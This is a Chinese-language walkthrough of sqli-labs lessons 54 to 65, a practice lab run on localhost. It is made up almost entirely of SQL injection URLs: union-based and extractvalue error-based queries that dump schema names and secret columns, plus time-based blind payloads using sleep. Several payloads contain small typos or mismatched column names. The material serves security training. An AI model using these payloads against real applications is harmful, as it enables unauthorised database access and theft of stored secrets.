LESS-54
此係列主要是一個進階的學習,將前面學到的知識進行更深次的運用。這一關我們主要考察
的依舊是字符型注入,但是隻能嘗試十次。所以需要在嘗試的時候進行思考。如何能更少的
減少次數。這裏的表名和密碼等是每十次嘗試後就強制進行更換。
因爲已經知道了數據庫名字叫做 challenges,所以我們需要知道表名 
輸入:
?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27–+
爆出了表名:dcifd0ca0t;
輸入:http://127.0.0.1/sqlilabs/Less-54/
?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27dcifd0ca0t%27–+
我們得到了所有的列,可以嘗試將所有的數據進行查看,此處知道了密碼在 secret_O8GE 列中,所以我們直接查看該列的內容
輸入:http://127.0.0.1/sqlilabs/Less-54/?id=-1’union select 1,2,group_concat(secret_P0F0) from challenges.dcifd0ca0t--+
LESS-55
本題與上一題的不同爲閉合方式不同。
輸入:http://127.0.0.1/sqlilabs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges’–+
輸入:http://127.0.0.1/sqlilabs/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘5d48supt0s’–+
輸入:http://127.0.0.1/sqlilabs/Less-55/?id=-1)%20union%20select%201,2,group_concat(secret_R35V)%20from%20challenges.5d48supt0s–+
LESS-56
與前面2題的方式相同,只是sql不同,不做詳解
LESS-57
這裏的sql雖然沒有閉合但是,前面已經有雙引號的處理了。
輸入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(table_name)%20from information_schema.tables where table_schema=‘challenges’–+
輸入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(column_name)%20from information_schema.columns where table_name=‘5d48supt0s’–+
輸入:http://127.0.0.1/sqlilabs/Less-57/?id=-1"%20union%20select%201,2,group_concat(secret_R35V)%20fromchallenges.5d48supt0s–+
LESS-58
執行 sql 語句後,並沒有返回數據庫當中的數據,所以我們這裏不能使用 union 聯合注入,這裏使用報錯注入
輸入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+
輸入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘7mu71b84nt’),0x7e))–+
輸入:http://127.0.0.1/sqlilabs/Less-58/?id=-1’ and extractvalue(1,concat(0x7e,(select group_concat(secret_3ZLC) from challenges.7mu71b84nt),0x7e))–+
Less-59
本題就閉合方式與上一題有所不同,不做詳解
LESS-60
也是比和方式有所不同。
輸入:http://127.0.0.1/sqlilabs/Less-60/?id=-1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.columns where table_schema=‘challenges’),0x7e))–+
Less-61
閉合方式有些特殊
輸入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+
輸入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘2wdgbim8tv’),0x7e))–+
輸入:http://127.0.0.1/sqlilabs/Less-61/?id=-1’)) and extractvalue(1,concat(0x7e,(select group_concat(secret_G7QO) from challenges.2wdgbim8tv),0x7e))–+
LESS-62
這裏union注入和報錯注入都不行
輸入:http://127.0.0.1/sqlilabs/Less-62/?id=1’)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+
正確會很快,而出現錯誤會等待10秒。
LESS-63
只是閉合方式有所不同
輸入:http://127.0.0.1/sqlilabs/Less-63/?id=1’and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’,1,1))=77,0,sleep(10))–+
LESS-64
只是閉合方式不同,不做詳解
LESS-65
只是閉合方式不同
輸入:http://127.0.0.1/sqlilabs/Less-65/?id=1") and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%2
7),1,1))=79,0,sleep(10))–+